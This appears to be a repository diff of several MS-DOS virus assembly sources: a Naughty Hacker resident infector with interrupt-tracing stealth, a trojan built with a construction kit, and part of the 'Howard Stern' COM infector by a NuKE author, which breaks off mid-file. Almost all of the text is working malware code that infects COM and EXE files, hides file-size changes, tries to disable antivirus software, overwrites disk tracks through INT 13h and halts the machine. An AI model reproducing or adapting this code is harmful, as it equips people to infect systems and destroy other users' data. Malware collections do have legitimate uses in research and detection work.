push [1*4+2] ; <= (C) by N.Hacker.
pushf
pushf
pushf
pushf
mov byte ptr cs:[flag-adjust],ah
mov byte ptr cs:[my_flag-adjust],ah
mov word ptr cs:[limit-adjust],300
mov word ptr cs:[mem_-adjust],org_21h-adjust
mov [1*4],offset trap-adjust
mov [1*4+2],cs
call set_trace
mov ax,3521
call dword ptr [21h*4]
mov byte ptr cs:[flag-adjust],0
mov word ptr cs:[mem_-adjust],org_2fh-adjust
call set_trace
mov ax,1200
call dword ptr [2fh*4] ;do trace int 2f
mov byte ptr cs:[flag-adjust],0
mov byte ptr cs:[my_flag-adjust],0FF
mov word ptr cs:[limit-adjust],0C800
mov word ptr cs:[mem_-adjust],org_13h-adjust
call set_trace
sub ax,ax
mov dl,al
call dword ptr [13h*4] ;do trace int 13
mov byte ptr cs:[flag-adjust],0
mov word ptr cs:[limit-adjust],0F000
mov word ptr cs:[mem_-adjust],Floppy_org_13h-adjust
call set_trace
sub ax,ax
mov dl,al
call dword ptr [13h*4]
pop [1*4+2]
pop [1*4]
les ax,[21*4]
mov word ptr cs:[current_21h-adjust],ax ;get old int 21
mov word ptr cs:[current_21h-adjust+2],es
mov [21*4], INT_21h_Entry_Point-adjust ;set it
mov [21*4+2],cs
retf
set_trace:
pushf
pop ax
or ax,100
push ax
popf
ret
trap:
push bp
mov bp,sp
push bx
push di
cmp byte ptr cs:[flag-adjust],0ff
je off
mov di,word ptr cs:[mem_-adjust]
mov bx,word ptr cs:[limit-adjust]
cmp [bp+4],bx
pushf
cmp word ptr cs:[my_flag-adjust],0ff
jne It_Is_JA
popf
jb Go_out_of_trap
jmp It_Is_JB
It_Is_JA:
popf
ja Go_out_of_trap
It_Is_JB:
mov bx,[bp+2]
mov word ptr cs:[di],bx
mov bx,[bp+4]
mov word ptr cs:[di+2],bx
mov byte ptr cs:[flag-adjust],0ff
off:
and [bp+6],0feff
Go_out_of_trap:
pop di
pop bx
pop bp
iret
Call_Original_INT_21h:
pushf
call dword ptr cs:[org_21h-adjust]
ret
Call_Original_INT_2Fh:
pushf
call dword ptr cs:[org_2fh-adjust]
ret
INT_24h_entry:
mov al,3
iret
;**************************
; (C) by N.Hacker. *
; (bellow) *
;**************************
INT_13h_entry:
mov byte ptr cs:[next_flag-adjust],0
cmp ah,2
jne Other
cmp byte ptr cs:[function-adjust],03Eh
jne Dont_hide
dec byte ptr cs:[next_flag-adjust]
inc ah
jmp Dont_hide
Other:
cmp ah,3
jne Dont_hide
cmp byte ptr cs:[flag-adjust],0ff
je no_error_
cmp byte ptr cs:[function-adjust],03Eh
je Dont_hide
inc byte ptr cs:[next_flag-adjust]
dec ah
Dont_hide:
pushf
call dword ptr cs:[current_13h-adjust]
jnc no_error_
mov byte ptr cs:[flag-adjust],0ff
no_error_:
clc
db 0ca,02,0 ;retf 2
DOS_13h:
cmp byte ptr cs:[next_flag-adjust],0
je OK
cmp ah,2
je Next
cmp ah,3
jne OK
Next:
cmp byte ptr cs:[next_flag-adjust],1
jne Read
inc ah
jne OK
Read:
dec ah
OK:
test dl,80
jz Floppy
jmp dword ptr cs:[org_13h-adjust]
Floppy:
jmp dword ptr cs:[Floppy_org_13h-adjust]
Read_First_18:
sub ax,ax
mov es:[di+4],ax
mov es:[di+6],ax
mov ah,3f
mov cx,18
mov dx,buffer-adjust
mov si,dx
call Call_Original_INT_21h
ret
Check_For_COMMAND:
cmp es:[di+0f],'OC'
jne Not_COMMAND
cmp es:[di+11],'MM'
jne Not_COMMAND
cmp es:[di+13],'NA'
jne Not_COMMAND ;check for command.com
cmp es:[di+15],' D'
jne Not_COMMAND
cmp es:[di+17],'OC'
jne Not_COMMAND
cmp byte ptr es:[di+19],'M'
Not_COMMAND:
ret
endcode label word
current_21h dd ?
null dd ? ;I forgot to remove this variable...
current_13h dd ?
org_2fh dd ?
org_13h dd ?
org_21h dd ?
Floppy_org_13h dd ?
flag db ? ;0ff if error occures
veri db ?
handle dw ?
fname db 8+3 dup (?)
function db ?
my_flag db ?
limit dw ?
mem_ dw ?
next_flag db ?
buffer label word

MSDOS/H-Index/Virus.MSDOS.Unknown.horse5.asm
+866
View File
@@ -0,0 +1,866 @@
.radix 16
;WARNING: THIS IS NOT A BASIC RELEASE BUT A WORK COPY!
;It seems that somebody had steal this version and
;circulates it now.
title The Naughty Hacker's virus version 3.0
comment / Naughty Hacker wishes you the best ! /
jmp start
virlen equ offset endcode-offset begin
alllen equ offset buffer-offset begin
begin label word
IP_save dw 20cdh
CS_save dw ?
SS_save dw ?
far_push dw ?
ident db 'C'
start:
call inf
inf:
pop bp
sub bp,offset start-offset begin+3
push es
push ds
mov es,es:[2]
mov di,start-begin
push ds
push cs
pop ds
mov si,di
add si,bp
mov cx,endcode-inf
cld
rep cmpsb
pop ds
push ds
pop es
je run
ina:
cmp word ptr [0],20cdh
je urud
jmp run
urud:
mov word ptr cs:[bp+handle-begin],0ffff
mov word ptr cs:[bp+counter-begin],2345
mov ax,ds
dec ax
mov ds,ax
sub word ptr [3],80
mov ax,es:[2]
sub ax,80
mov es:[2],ax
push ax
sub di,di
mov si,bp
mov ds,di
pop es
push cs
pop ds
mov cx,alllen
rep movsb
push cs
mov ax,offset run-begin
add ax,bp
push ax
push es
mov ax,offset inss-100-3
push ax
retf
run:
pop ds
pop es
cmp byte ptr cs:[bp+ident-begin],'C'
je comfile
mov dx,cs:[bp+CS_save-begin]
mov cx,cs
sub cx,word ptr cs:[bp+far_push-begin]
add dx,cx
add cx,cs:[bp+SS_save-begin]
cli
mov ss,cx
sti
clear:
push dx
push word ptr cs:[bp+IP_save-begin]
call clearr
retf
comfile:
mov ax,cs:[bp+IP_save-begin]
mov [100],ax
mov ax,cs:[bp+CS_save-begin]
mov [102],ax
mov ax,100
push ax
call clearr
retn
cur:
call exec
push bx
push es
push si
push ax
mov si,dx
cmp byte ptr [si],0ff
jne puf
mov ah,2f
call exec
mov al,byte ptr es:[bx+22d+7+1]
and al,31d
cmp al,31d
jnz puf
cmp word ptr es:[bx+28d+2+7+1],0
jne scs
cmp word ptr es:[bx+28d+7+1],virlen*2
jb puf
scs:
sub word ptr es:[bx+28d+7+1],virlen
sbb word ptr es:[bx+28d+2+7+1],0
puf:
pop ax
pop si
pop es
pop bx
iret
inff:
dec word ptr cs:[counter-begin]
jnz neass
call shop
neass:
cmp ah,11
je cur
cmp ah,12
je cur
cmp ah,4e
jne cur1.1
jmp cur1
cur1.1:
cmp ah,4f
jne cur1.2
jmp cur1
cur1.2:
cmp ah,3ch
je create
cmp ah,5bh
je create
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov byte ptr cs:[function-begin],ah
cmp ah,3dh
je open
cmp ah,3e
je close_
cmp ax,4b00
je execute
cmp ah,17
je ren_FCB
cmp ah,56
je execute
cmp ah,43
je execute
here:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[current_21h-begin]
ren_FCB:
call transfer
call coont
jmp here
create:
call exec
mov word ptr cs:[handle-begin],ax
db 0ca,2,0
close_:
cmp word ptr cs:[handle-begin],0ffff
je here
cmp bx,word ptr cs:[handle-begin]
jne here
mov ah,45
call coont
mov word ptr cs:[handle-begin],0ffff
jmp here
execute:
mov ah,3dh
call coont
jmp here
open:
call coont
jmp here
cur1:
call exec
pushf
push ax
push bx
push es
mov ah,2f
call exec
mov al,es:[bx+22d]
and al,31d
cmp al,31d
jne puf1
cmp es:[bx+28d],0
jne scs1
cmp es:[bx+26d],virlen*2
jb puf1
scs1:
sub es:[bx+26d],virlen
sbb es:[bx+28d],0
puf1:
pop es
pop bx
pop ax
popf
db 0ca,2,0 ;retf 2
coont:
call exec
jnc ner
ret
ner:
mov bp,ax
mov byte ptr cs:[flag-begin],0
mov ah,54
call exec
mov byte ptr cs:[veri-begin],al
cmp al,1
jne rty
mov ax,2e00
call exec
rty:
mov ax,3508
call exec
mov word ptr cs:[current_08h-begin],bx
mov word ptr cs:[current_08h-begin+2],es
push bx
push es
mov al,21
call exec
push bx
push es
mov al,24
call exec
push bx
push es
mov al,13
call exec
push bx
push es
mov ah,25
mov dx,int13h-begin
push cs
pop ds
call exec
mov al,21
lds dx,cs:[org_21h-begin]
call exec
mov al,24
push cs
pop ds
mov dx,int24h-begin
int 21
mov al,8
mov dx,int08h-begin
int 21
mov bx,bp
push bx
mov ax,1220
call exec2f
mov bl,es:[di]
mov ax,1216
call exec2f
pop bx
add di,11
mov byte ptr es:[di-15d],2
mov ax,es:[di]
mov dx,es:[di+2]
cmp dx,0
jne contss
cmp ax,virlen
jnb contss
jmp close
contss:
cmp byte ptr cs:[function-begin],3dh
jne hhh
push di
add di,0f
mov si,offset fname-begin
cld
mov cx,8+3
rep cmpsb
pop di
jne hhh
jmp close
hhh:
cmp es:[di+18],'MO'
jne a2
jmp com
a2:
cmp es:[di+18],'EX'
je a8
jmp close
a8:
cmp byte ptr es:[di+17],'E'
je a3
jmp close
a3:
call cont
cmp word ptr [si],'ZM'
je okk
cmp word ptr [si],'MZ'
je okk
jmp close
okk:
cmp word ptr [si+0c],0
jne uuu
jmp close
uuu:
mov cx,[si+16]
add cx,[si+8]
mov ax,10
mul cx
add ax,[si+14]
adc dx,0
mov cx,es:[di+2]
sub cx,dx
or cx,cx
jnz usm
mov cx,es:[di]
sub cx,ax
cmp cx,virlen-(start-begin)
jne usm
jmp close
usm:
mov byte ptr [ident-begin],'E'
mov ax,[si+0e]
mov [SS_save-begin],ax
mov ax,[si+14]
mov [IP_save-begin],ax
mov ax,[si+16]
mov [CS_save-begin],ax
mov ax,es:[di]
mov dx,es:[di+2]
add ax,virlen
adc dx,0
mov cx,200
div cx
mov [si+2],dx
or dx,dx
jz oj
inc ax
oj:
mov [si+4],ax
mov ax,es:[di]
mov dx,es:[di+2]
mov cx,4 ; This could be so:
mov bp,ax ;
and bp,0fh ; mov cx,10
lpp: ; div cx
shr dx,1 ;
rcr ax,1 ;
loop lpp ;
mov dx,bp ;
sub ax,[si+8]
add dx,start-begin
adc ax,0
mov [si+14],dx
mov [si+16],ax
mov word ptr [far_push-begin],ax
add ax,200
mov [si+0eh],ax
write:
sub cx,cx
mov es:[di+4],cx
mov es:[di+6],cx
push es:[di-2]
push es:[di-4]
xchg cx,es:[di-0dh]
push cx
mov ah,40
mov dx,buffer-begin
mov cx,01bh
int 21
cmp byte ptr cs:[flag-begin],0ff
jne ghj
stc
jc exit
ghj:
mov ax,es:[di]
mov es:[di+4],ax
mov ax,es:[di+2]
mov es:[di+6],ax
call com?
jne f2
sub es:[di+4],virlen
sbb es:[di+6],0
f2:
mov ah,40
sub dx,dx
mov cx,virlen
int 21
cmp byte ptr cs:[flag-begin],0ff
jne exit
stc
exit:
pop cx
mov es:[di-0dh],cx
pop cx
pop dx
or byte ptr es:[di-0bh],40
jc closed
call com?
jne f3
and cx,31d
or cx,2
jmp closed
f3:
or cx,31d
closed:
mov ax,5701
int 21
close:
mov ah,3e
int 21
or byte ptr es:[di-0ch],40
push es
pop ds
mov si,di
add si,0f
mov di,offset fname-begin
push cs
pop es
mov cx,8+3
cld
rep movsb
push cs
pop ds
cmp byte ptr cs:[flag-begin],0ff
jne qw
mov ah,0dh
int 21
qw:
cmp byte ptr cs:[veri-begin],1
jne rtyyu
mov ax,2e01
call exec
rtyyu:
sub ax,ax
mov ds,ax
cli
pop [13*4+2]
pop [13*4]
pop [24*4+2]
pop [24*4]
pop [21*4+2]
pop [21*4]
pop [8*4+2]
pop [8*4]
sti
retn
com:
test byte ptr es:[di-0dh],4
jz esc4
jmp close
esc4:
call cont
cmp byte ptr [si],0e9
jne usm2
mov ax,es:[di]
sub ax,[si+1]
cmp ax,virlen-(start-begin-3)
jne usm2
jmp close
usm2:
push si
cmp byte ptr es:[di+17],'C'
jne esc
mov byte ptr [ident-begin],'C'
lodsw
mov cs:[IP_save-begin],ax
lodsw
mov cs:[CS_save-begin],ax
mov ax,es:[di]
cmp ax,65535d-virlen-1
pop si
jb esc
jmp close
esc:
add ax,start-begin-3
call com?
jne f1
sub ax,virlen
f1:
mov byte ptr [si],0e9
mov word ptr [si+1],ax
jmp write
inss:
sub ax,ax
mov ds,ax
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov [1*4],offset trap-begin
mov [1*4+2],cs
pushf
pop ax
or ax,100
push ax
popf
mov ax,0ffff
call dword ptr [21h*4]
sub ax,ax
mov ds,ax
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov [1*4],offset trap2-begin
mov [1*4+2],cs
pushf
pop ax
or ax,100
push ax
popf
mov ax,0ffff
call dword ptr [2fh*4]
sub ax,ax
mov ds,ax
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov [1*4],offset trap3-begin
mov [1*4+2],cs
pushf
pop ax
or ax,100
push ax
popf
sub ax,ax
call dword ptr [13h*4]
sub ax,ax
mov ds,ax
les ax,[21*4]
mov word ptr cs:[current_21h-begin],ax
mov word ptr cs:[current_21h-begin+2],es
mov [21*4],offset inff-begin
mov [21*4+2],cs
retf
trap:
push bp
mov bp,sp
push bx
cmp [bp+4],300
ja exit2
mov bx,[bp+2]
mov word ptr cs:[org_21h-begin],bx
mov bx,[bp+4]
mov word ptr cs:[org_21h-begin+2],bx
and [bp+6],0feff
exit2:
pop bx
pop bp
iret
trap2:
push bp
mov bp,sp
push bx
cmp [bp+4],100
ja exit3
mov bx,[bp+2]
mov word ptr cs:[org_2fh-begin],bx
mov bx,[bp+4]
mov word ptr cs:[org_2fh-begin+2],bx
and [bp+6],0feff
exit3:
pop bx
pop bp
iret
trap3:
push bp
mov bp,sp
push bx
cmp [bp+4],0C800
jb exit4
mov bx,[bp+2]
mov word ptr cs:[org_13h-begin],bx
mov bx,[bp+4]
mov word ptr cs:[org_13h-begin+2],bx
and [bp+6],0feff
exit4:
pop bx
pop bp
iret
exec:
pushf
call dword ptr cs:[org_21h-begin]
ret
exec2f:
pushf
call dword ptr cs:[org_2fh-begin]
ret
int08h:
pushf
call dword ptr cs:[current_08h-begin]
push ax
push ds
sub ax,ax
mov ds,ax
cli
mov [13*4],offset int13h-begin
mov [13*4+2],cs
mov [8*4],offset int08h-begin
mov [8*4+2],cs
mov ax,word ptr cs:[org_21h-begin]
mov [21*4],ax
mov ax,word ptr cs:[org_21h-begin+2]
mov [21*4+2],ax
mov [24*4],offset int24h-begin
mov [24*4+2],cs
sti
pop ds
pop ax
iret
int24h:
mov al,3
iret
int13h:
pushf
call dword ptr cs:[org_13h-begin]
jnc dfg
mov byte ptr cs:[flag-begin],0ff
dfg:
clc
db 0ca,02,0 ;retf 2
cont:
sub ax,ax
mov es:[di+4],ax
mov es:[di+6],ax
mov ah,3f
mov cx,01bh
mov dx,offset buffer-begin
mov si,dx
int 21
cmp byte ptr cs:[flag-begin],0ff
jne a1
stc
pop ax
jmp close
a1:
ret
com?:
cmp es:[di+0f],'OC'
jne zz
cmp es:[di+11],'MM'
jne zz
cmp es:[di+13],'NA'
jne zz
cmp es:[di+15],' D'
jne zz
cmp es:[di+17],'OC'
jne zz
cmp byte ptr es:[di+19],'M'
zz:
ret
transfer:
cld
inc dx
mov si,dx
mov di,offset buffer-begin
push di
push cs
pop es
mov cx,8
rep movsb
mov al,'.'
stosb
mov cx,3
rep movsb
mov al,0
stosb
pop dx
push cs
pop ds
mov ax,3d00
ret
e1:
cli
push ax
push di
push es
mov ax,0b800
mov es,ax
mov ax,word ptr cs:[pos-begin]
push ax
call comp
mov ax,word ptr cs:[strg-begin]
stosw
pop ax
or ah,ah
jz s3
cmp ah,24d
jb s1
s3:
neg byte ptr cs:[y-begin]
s1:
or al,al
jz s4
cmp al,79d
jb s2
s4:
neg byte ptr cs:[x-begin]
s2:
mov ah,byte ptr cs:[y-begin]
mov al,byte ptr cs:[x-begin]
add byte ptr cs:[pos+1-begin],ah
add byte ptr cs:[pos-begin],al
mov ax,word ptr cs:[pos-begin]
call comp
mov ax,es:[di]
mov word ptr cs:[strg-begin],ax
mov es:[di],0f07
pop es
pop di
pop ax
sti
iret
comp:
push ax
push bx
sub bh,bh
mov bl,al
mov al,160d
mul ah
add ax,bx
add ax,bx
mov di,ax
pop bx
pop ax
ret
shop:
push ax
push ds
mov byte ptr cs:[x-begin],0ff
mov byte ptr cs:[y-begin],0ff
mov word ptr cs:[pos-begin],1013
mov ax,0003
int 10
sub ax,ax
mov ds,ax
cli
mov [1c*4],offset e1-begin
mov [1c*4+2],cs
sti
pop ds
pop ax
ret
clearr:
sub ax,ax
sub bx,bx
sub cx,cx
sub dx,dx
sub si,si
sub di,di
sub bp,bp
ret
db 666d ;Foolish ?!! -> dw 666d
db 55,0AA
endcode label word
current_21h dd ?
current_08h dd ?
org_2fh dd ?
org_13h dd ?
org_21h dd ?
flag db ?
veri db ?
handle dw 0ffff
fname db 8+3 dup (?)
function db ?
pos dw ?
x db ?
y db ?
strg dw ?
counter dw ?
buffer label word
MSDOS/H-Index/Virus.MSDOS.Unknown.horse8.asm
+1366
View File
File diff suppressed because it is too large Load Diff
MSDOS/H-Index/Virus.MSDOS.Unknown.host.asm
+20
View File
@@ -0,0 +1,20 @@
.model tiny
.code
;******************************************************************************
;The host program starts here. This one is a dummy that just returns control
;to DOS.
public HOST
db 100 dup (0)
HOST:
mov ax,4C00H ;Terminate, error code = 0
int 21H
HOST_END:
END

MSDOS/H-Index/Virus.MSDOS.Unknown.house.asm
+88
View File
@@ -0,0 +1,88 @@
; Trojan Horse Constructed with...
; The Trojan Horse Construction Kit, v1.00
; Copyright(c) 1992, Stingray/VIPER
; A Viral Inclined Programming Experts Ring Programming Team Production.
IDEAL
DOSSEG
MODEL small
STACK 256
DATASEG
msg_1 db "",13,10
db "This is a Trojain horse. Curtocy of White Shark! HA HA HA",13,10
db "",13,10
db "Mess with White Shark and you'll be eaten alive!",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db '$'
msg_2 db "",13,10
db "You've been fucked! Curtocy of White Shark!",13,10
db "",13,10
db "Mess with White Shark and you'll be eaten alive!",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db '$'
vip db "±ÅÆÐ}ÑÏÌǾË}Ô¾Ð}ÀϾÑÂÁ}ÔÆÑÅ‹‹‹",106,103
db "±ÅÂ}±ÏÌǾË}¥ÌÏÐÂ} ÌËÐÑÏÒÀÑÆÌË}¨Æщ}ÓŽ‹",106,103
db " ÌÍÖÏÆÄÅÑ}…À†}Ž––‰}³ÆϾÉ}¦ËÀÉÆËÂÁ}­ÏÌÄϾÊÊÆËÄ}¢ÕÍÂÏÑÐ}¯ÆËÄ‹",106,103
CODESEG
Start:
mov ax,@data
mov ds,ax
mov ah,9
mov dx,offset msg_1
int 21h
mov dl,24
aqui:
call fry
call fry
call fry
inc dl
cmp dl,1
jne aqui
mov ah,9
mov dx,offset msg_2
int 21h
mov si,offset vip
call DeCrypt_Print
jmp Exit
PROC DeCrypt_Print
push ax
push dx
here:
lodsb
or al,al
je no_mas
xchg dl,al
sub dl,93
mov ah,2
int 21h
jmp short here
no_mas:
pop ax
pop dx
ret
ENDP DeCrypt_Print
PROC fry
push dx
mov ax,ds
mov es,ax
mov ax,0701h
mov ch,0
int 13h
pop dx
ret
ENDP fry
Exit:
mov ax,4c00h
int 21h
END Start
MSDOS/H-Index/Virus.MSDOS.Unknown.howard.asm
+472
View File
@@ -0,0 +1,472 @@
; E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nuÿÿÿÿÿÿ
; uK E-ÿÿÿÿÿÿ
; E- 'HOWARD STERN ViRUS ASM SOURCE' Nuÿÿÿÿÿÿ
; Nu KEÿÿÿÿÿÿ
; KE ~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Nÿÿÿÿÿÿ
; -N by uKÿÿÿÿÿÿ
; uK DEATHBOY [NuKE] E-ÿÿÿÿÿÿ
; E- Nuÿÿÿÿÿÿ
; E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nuÿÿÿÿÿÿ
;ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
; [HOWARD].ASM -- The Howard Stern virus
;
; Written by DeathBoy[NuKE]
;
; Well, this ought to turn some heads... NOT... this is the source code for
; a New Virus... It displays ' I'm Not working until Howard Stern is Done
; @ 11:00 am. Bow down Before the King.' if the infected program is ran
; anytime before 11:00 am.===> Then lock up the Computer!
; It is a Non-Resident .COM infector that is 967 bytes long
; compiled...TO make this a Working DEMO...you will need TASM v2.0
; or better... ( TASM /mx /m2 /q HOWARD.asm ) then
; ( TLINK /x /t HOWARD.obj )
; the result should be a 1003 byte *.COM file infector that follows
; the DOS PATH= looking for victim files...
; it will only infect 2 files per execution
; of an infected file...
;
; CHEERS TO YOU HOWARD & Robin, I'm a Big FAN... Please
; COME TO ATLANTA, GA...
; Infinity ( 92.9 FM ) has the GreaseIdiot on & I'm
; going Crazy!
;
; Ps. I thought the Book was funny, #2 on the Best-seller's list in the
; area Stores ( & YOU ARE NOT ON DOWN HERE !!! ) ... Keep it up...
;
;=====> The intent of this VIRUS is not to destroy but to Annoy, !
;Please do not give anyone this virus unless they want it, Knowingly ...
; You are responsible for your actions...
;
; BTW, there is a slight Bug in the Virus, put there on purpose
; It is an easy one to find & FIX... IF you can fix it,
; then :) You do not need to register.
;
; If not... then you do not need to know how.
; OR
; If you register however, I will take out the 'Beg/Buggy-Code'
;
; Get you AV idiots... FYA ESAD YMABFFW
;
; Long Live [NuKE], ARiSToTLE, NT, BO, & the latest [NuKE]
; member .. NoSFaRTu(sp) :)
;
;----------------------------CUT HERE-----------------------------------
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
push di ; Stupid Shit For Stupid
push bp ; Programs
push dx ;
mov ax,05FEh ; Trash some mem. res.
mov dx,0A6BAh ; software...
not ax ;
not dx ;
int 16h ; golly wally, did that work?
mov ax,05FDh ;
mov dx,0A6BAh ; Maybe this time ???
mov bx,0000h ;
not ax ;
not dx ;
int 16h ;
pop dx ;
pop bp ;
pop di ; Ok. lets do this.
db 0E9h,00h,00h ; Standard BS pointer
start: call get_loc ; Like an Old trick
get_loc: pop bp ; BP holds old IP
sub bp,offset get_loc; Adjust for length of host
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
xchg ax,bx ; beat the heat
xchg bx,ax ; with clean code
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
push sp ; doing the nasty with the
pushf ; stupid coding.
push bp ; Are you sure you know
push di ; what you are doing??
push dx ; Doesn't look it??
call disvsafe ; Ahh, FiDO-DoRKS LOOK HERE
pop dx ; Snoop-doogy dawg...
pop di ; Yippie-Oh Yippie-heh.
pop bp ;
popf ; Freedom to do as I please.
pop sp ;
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
xchg ax,bx ; Do Stuff for fun.
xchg ax,bx ; Reiterate that
int 021h ; R U still reading this??
; WHy??? :^)
call search_me ; Find and infect a file
call search_me ; 2 files
call get_hour
cmp ax,000Bh ; Did the function return 11?
jle go_next ; If less than or equal, do effec
jmp not_yet ; Otherwise skip over it
go_next: cmp ax,0006h ; Before 6:00am ??
jge strt00 ; Yep, Go do it
jmp not_yet ; Nop, let get outta here
strt00:
push sp ; More BS... for the
pushf ; Bytes...
push bp ;
push di ; It looks good in hex :)
push dx ; Not! Show me some fucked
; code please!!!
mov ah,09h ; BIOS display char. function
mov dx, offset data01 ; whoop there it is...
int 21h
pop dx ; This is just for kicks
pop di ; & giggles...
pop bp ; Something tells
popf ; me to do this...
pop sp ; just for laughs
lea si,[di + data00] ; SI points to shit
call show_this
mov cx,45h ; number of flashes
flash:
xor ax,ax ; Clear Register
mov al,0FFh ; Load binary flags
mov dx,060h ; Port number
out 060h,al ; Toggle Keyboard lights
dec cx ; lets do it one less time
nop ; good for what ails you.
jcxz getout ; ok, I'm thru.
nop
loop flash ; nah, I want to do it again
getout: cli ; Clear the interrupt flag
hlt ; HALT the computer
jmp $ ; Why not??
not_yet: xor ax,ax ; Clear Register
mov al,0FFh ; Load binary flags
mov dx,060h ; Port number
out 060h,al ; Toggle Keyboard lights
dec cx ; lets do it one less time
nop ; good for what ails you.
jcxz com_end ; ok, I'm thru.
loop not_yet ; nah, I want to do it again
com_end: pop dx ; DX holds DTA address
mov ah,01Ah ; DOS set DTA function
int 021h
mov sp,bp ; Deallocate local buffer
xor ax,ax ;
mov bx,ax ;
mov cx,ax ;
mov dx,ax ; DUMP out the registers
mov si,ax ;
mov di,ax ;
mov bp,ax ;
ret ; Return to original program
main endp
disvsafe proc near ; Well, Now this
mov ax,05FEh ; is abusive.
mov dx,0A6BAh ;
not ax ;
not dx ;
int 16h ; Pretty Stupid, Huh?
mov ax,05FDh ; Ha... You're looking
mov dx,0A6BAh ; at it aren't you??
mov bx,0000h ;
not ax ;
not dx ; Yep, Lamest...
int 16h ;
ret ;
disvsafe endp
search_me proc near
mov bx,di ; BX points to the virus
push bp ; Save BP
mov bp,sp ; BP points to local buffer
sub sp,135 ; Allocate 135 bytes on stack
mov byte ptr [bp - 135],'\' ; Start with a backslash
mov ah,01h ; Clean code, Clean code...
mov ah,047h ; DOS get current dir function
xor dl,dl ; DL holds drive # (current)
lea si,[bp - 134] ; SI points to 64-byte buffer
int 021h
call scan_path ; Start scanning
scanpath_loop: cmp word ptr [bx + path_ad],0 ; Was the search unsucces
je found_none ; If so then we're done
call found_sub ; Otherwise copy the subdirectory
mov ax,cs ; AX holds the code segment
mov ds,ax ; Set the data and extra
mov es,ax ; segments to the code segment
xor al,al ; Zero AL
stosb ; NULL-terminate the directory
xor ah,ah ; Clear register
mov ah,03Bh ; DOS change directory function
lea dx,[bp - 70] ; DX points to the directory
int 021h
lea dx,[bx + com_mask] ; DX points to '*.COM'
push di
mov di,bx
call find_me ; Try to infect a .COM file
mov bx,di
pop di
jnc found_none ; If successful the exit
jmp short scanpath_loop ; Keep checking the PATH
found_none: mov ah,03Bh ; DOS change directory function
lea dx,[bp - 135] ; DX points to old directory
int 021h
cmp word ptr [bx + path_ad],0 ; Did we run out of direc
jne try_again ; If not then exit
stc ; Set the carry flag for failure
try_again: mov sp,bp ; Restore old stack pointer
pop bp ; Restore BP
ret ; Return to caller
com_mask db '*.COM',0 ; Mask for all .COM files
search_me endp
scan_path proc near
mov es,word ptr cs:[002Ch] ; ES holds the enviroment s
xor di,di ; DI holds the starting offset
find_path: lea si,[bx + path_string] ; SI points to 'PATH='
lodsb ; Load the 'P' into AL
xor cl, cl ; Clean those registers
mov cx,08000h ; Check the first 32767 bytes
repne scasb ; Search until the byte is found
mov cx,4 ; Check the next four bytes
check_next_4: lodsb ; Load the next letter of 'PATH='
scasb ; Compare it to the environment
jne find_path ; If there not equal try again
loop check_next_4 ; Otherwise keep checking
mov word ptr [bx + path_ad],di ; Save the PATH add
mov word ptr [bx + path_ad + 2],es ; Save the PATH's s
ret ; Return to caller
path_string db 'PATH=' ; The PATH string to search for
path_ad dd ? ; Holds the PATH's address
scan_path endp
found_sub proc near
lds si,dword ptr [bx + path_ad] ; DS:SI points to P
lea di,[bp - 70] ; DI points to the work buffer
push cs ; Transfer CS into ES for
pop es ; byte transfer
move_sub: lodsb ; Load the next byte into AL
cmp al,';' ; Have we reached a separator?
je moved_one ; If so we're done copying
or al,al ; Are we finished with the PATH?
je moved_last_one ; If so get out of here
stosb ; Store the byte at ES:DI
jmp short move_sub ; Keep transfering characters
; keep it up
moved_last_one: mov si,0000h ; Zero SI to signal complet
moved_one: mov word ptr es:[bx + path_ad],si ; Store SI in the pa
ret ; Return to caller
found_sub endp
find_me proc near
push bp ; Save BP
mov ah,0FFh ; Clean code
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address
mov bp,sp ; BP points to local buffer
sub sp,128 ; Allocate 128 bytes on stack
push dx ; Save file mask
mov ah,0FFh ; Clean code
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
xchg ax,bx ; Lets do the Time
xchg ax,bx ; warp again
int 021h
mov ah,0FFh ; Clean code just for fun
mov ah,04Eh ; DOS find first file function
mov cx,00100111b ; CX holds all file attributes
pop dx ; Restore file mask
find_a_file: int 021h
jc found_out ; Exit if no files found
call infect_file ; Infect the file!
jnc found_out ; Exit if no error
mov ah,0FFh ; Clean code
mov ah,04Fh ; DOS find next file function
jmp short find_a_file; Try finding another file
found_out: mov sp,bp ; Restore old stack frame
mov ah,0FFh ; Clean code
mov ah,01Ah ; DOS set DTA function
pop dx ; Retrieve old DTA address
int 021h
pop bp ; Restore BP
ret ; Return to caller
find_me endp ; Are you reading this
; nonsense?
show_this proc near
mov ah,0Eh ; BIOS display
loop_this: lodsb ; Load next char. into AL
or al,al ; Is the character a null?
je show_ended ; Yep, exit
int 010h ; BIOS video interrupt
jmp short loop_this ; Do next character
show_ended:
ret ; Return to caller
show_this endp
data00 db ' I'm not working until Howard Stern is done @ 11:00 am
db ' Bow down before the King ',13,12
db ' Smile ... [NuKE] loves you',13,10,13,10,07,13,0
data01 db ' I'm not working until Howard Stern is done @ 11:00 am
infect_file proc near
